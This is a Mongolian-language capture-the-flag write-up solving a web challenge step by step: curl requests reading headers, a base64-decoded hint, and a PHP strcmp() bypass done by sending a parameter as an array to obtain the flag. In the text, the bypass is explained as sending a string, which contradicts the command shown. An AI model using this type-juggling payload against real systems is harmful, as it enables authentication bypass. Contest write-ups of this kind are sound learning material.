Өгөгдөл
Даалгаврын нэр: Толгой
Хандах хаяг: http://103.48.116.193:8008/
Оноо: 40 оноо
Энэ даалгаврын хувьд тэмцээний үеэр хийж чадаагүй бөгөөд толгой (Header) дээрээс ямар нэгэн зүйл олохоос өөр санаа байсангүй.
Тэмцээний маргааш нь curl ашиглаж header-үүдийг харж болохыг мэдсэн бөгөөд тугийг олж чадсан юм.
$ curl -I http://103.48.116.193:8008/асуулт 1: Харуул Занги эхний тэмцээн болсон он? /хариултаа илээр явуулна уу. ‘answer_level_one’ /
гэсэн хариу ирэх бөгөөд илээр гэдэг нь get хүсэлтийг хэлж байна. Харуул занги анхны тэмцээн 2013 онд болсон бөгөөд дахин curl ашиглаж үзье.
$ curl -I http://103.48.116.193:8008/?answer_level_one=2013Найдвар: aDRydVVMLVpAbkcxXzIwMTY= /хариултыг илээр явуулна уу. ‘answer_next_one’/
Өгөгдсөн base64-г тайлъя.
$ base64 -D <<< "aDRydVVMLVpAbkcxXzIwMTY="h4ruUL-Z@nG1_2016 гэсэн тэмдэгт мөр гарч ирлээ.
$ curl -I http://103.48.116.193:8008/?answer_next_one=h4ruUL-Z@nG1_2016Учрыг ол : hint php strcmp() /хариултыг далдаар явуулна уу. ‘answer_level_last_one’/
http://103.48.116.193:8008/?answer_next_one=h4ruUL-Z@nG1_2016 хаяг руу хандаж үзвэл input форм харагдана. Өгөгдсөн hint-г уншвал шалгалтаа strcmp() функц ашиглаж хийдэг бололтой. strcmp-г bypass хийхийн тулд тэмдэгт мөр хэлбэрээр хүсэлт явуулахад л болно.
$ curl -d "answer_level_last_one[]=a" http://103.48.116.193:8008/?answer_next_one=h4ruUL-Z@nG1_2016FLAG: HZ{0nly_4rrAy_p4$$_1t}
Эцэст нь туг: HZ{0nly_4rrAy_p4$$_1t}